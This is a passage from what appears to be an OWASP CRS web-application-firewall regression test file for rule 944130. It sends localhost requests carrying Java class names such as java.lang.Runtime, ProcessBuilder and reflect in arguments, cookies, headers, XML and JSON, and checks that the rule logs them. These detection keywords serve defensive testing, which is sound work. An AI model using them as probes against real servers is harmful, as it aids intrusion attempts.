"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.Process\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-319 + desc: "Content-Type application/json arg name includes keyword java.lang.Process" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.lang.Process\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-320 + desc: "Argument test includes keyword java.lang.ProcessBuilder" + stages: + - stage: + input: + 
dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.ProcessBuilder" + output: + log_contains: "id \"944130\"" + - test_title: 944130-321 + desc: "Argument name includes keyword java.lang.ProcessBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.ProcessBuilder=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-322 + desc: "Cookie test includes keyword java.lang.ProcessBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.ProcessBuilder + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-323 + desc: "Cookie name includes keyword java.lang.ProcessBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: 
"gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.ProcessBuilder=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-324 + desc: "Request header test includes keyword java.lang.ProcessBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.ProcessBuilder + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-325 + desc: "XML attribute value includes keyword java.lang.ProcessBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-326 + desc: "XML element value includes keyword java.lang.ProcessBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.ProcessBuilder" + output: + log_contains: "id \"944130\"" + - test_title: 944130-327 + desc: 
"Nested XML element value includes keyword java.lang.ProcessBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.ProcessBuilder" + output: + log_contains: "id \"944130\"" + - test_title: 944130-328 + desc: "Content-Type text/plain includes keyword java.lang.ProcessBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.ProcessBuilder" + output: + log_contains: "id \"944130\"" + - test_title: 944130-329 + desc: "Content-Type application/json arg value includes keyword java.lang.ProcessBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.ProcessBuilder\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-330 + desc: "Content-Type application/json arg name includes keyword java.lang.ProcessBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.lang.ProcessBuilder\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-331 + desc: "Argument test includes keyword java.lang.reflect" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.reflect" + output: + log_contains: "id \"944130\"" + - test_title: 944130-332 + desc: "Argument name includes keyword java.lang.reflect" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.reflect=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-333 + desc: "Cookie test includes keyword java.lang.reflect" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.reflect + method: "POST" + version: "HTTP/1.0" 
+ data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-334 + desc: "Cookie name includes keyword java.lang.reflect" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.reflect=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-335 + desc: "Request header test includes keyword java.lang.reflect" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.reflect + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-336 + desc: "XML attribute value includes keyword java.lang.reflect" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-337 + desc: "XML element value includes keyword java.lang.reflect" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS 
test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.reflect" + output: + log_contains: "id \"944130\"" + - test_title: 944130-338 + desc: "Nested XML element value includes keyword java.lang.reflect" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.reflect" + output: + log_contains: "id \"944130\"" + - test_title: 944130-339 + desc: "Content-Type text/plain includes keyword java.lang.reflect" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.reflect" + output: + log_contains: "id \"944130\"" + - test_title: 944130-340 + desc: "Content-Type application/json arg value includes keyword java.lang.reflect" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.reflect\"}" + 
output: + log_contains: "id \"944130\"" + - test_title: 944130-341 + desc: "Content-Type application/json arg name includes keyword java.lang.reflect" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.lang.reflect\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-342 + desc: "Argument test includes keyword java.lang.Runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.Runtime" + output: + log_contains: "id \"944130\"" + - test_title: 944130-343 + desc: "Argument name includes keyword java.lang.Runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Runtime=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-344 + desc: "Cookie test includes keyword java.lang.Runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.Runtime + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-345 + desc: "Cookie name includes keyword java.lang.Runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.Runtime=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-346 + desc: "Request header test includes keyword java.lang.Runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.Runtime + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-347 + desc: "XML attribute value includes keyword java.lang.Runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + 
version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-348 + desc: "XML element value includes keyword java.lang.Runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Runtime" + output: + log_contains: "id \"944130\"" + - test_title: 944130-349 + desc: "Nested XML element value includes keyword java.lang.Runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Runtime" + output: + log_contains: "id \"944130\"" + - test_title: 944130-350 + desc: "Content-Type text/plain includes keyword java.lang.Runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.Runtime" + output: + log_contains: "id \"944130\"" + - test_title: 944130-351 + desc: "Content-Type application/json arg value includes keyword java.lang.Runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + 
Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.Runtime\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-352 + desc: "Content-Type application/json arg name includes keyword java.lang.Runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.lang.Runtime\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-353 + desc: "Argument test includes keyword java.lang.String" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.String" + output: + log_contains: "id \"944130\"" + - test_title: 944130-354 + desc: "Argument name includes keyword java.lang.String" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: 
"java.lang.String=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-355 + desc: "Cookie test includes keyword java.lang.String" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.String + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-356 + desc: "Cookie name includes keyword java.lang.String" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.String=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-357 + desc: "Request header test includes keyword java.lang.String" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.String + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-358 + desc: "XML attribute value includes keyword java.lang.String" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: 
"localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-359 + desc: "XML element value includes keyword java.lang.String" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.String" + output: + log_contains: "id \"944130\"" + - test_title: 944130-360 + desc: "Nested XML element value includes keyword java.lang.String" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.String" + output: + log_contains: "id \"944130\"" + - test_title: 944130-361 + desc: "Content-Type text/plain includes keyword java.lang.String" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.String" + output: + 
log_contains: "id \"944130\"" + - test_title: 944130-362 + desc: "Content-Type application/json arg value includes keyword java.lang.String" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.String\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-363 + desc: "Content-Type application/json arg name includes keyword java.lang.String" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.lang.String\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-364 + desc: "Argument test includes keyword java.lang.StringBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.StringBuilder" + output: + log_contains: "id \"944130\"" + - test_title: 944130-365 + desc: "Argument name includes keyword java.lang.StringBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test 
agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.StringBuilder=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-366 + desc: "Cookie test includes keyword java.lang.StringBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.StringBuilder + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-367 + desc: "Cookie name includes keyword java.lang.StringBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.StringBuilder=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-368 + desc: "Request header test includes keyword java.lang.StringBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: 
"application/x-www-form-urlencoded" + test: java.lang.StringBuilder + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-369 + desc: "XML attribute value includes keyword java.lang.StringBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-370 + desc: "XML element value includes keyword java.lang.StringBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.StringBuilder" + output: + log_contains: "id \"944130\"" + - test_title: 944130-371 + desc: "Nested XML element value includes keyword java.lang.StringBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.StringBuilder" + output: + log_contains: "id 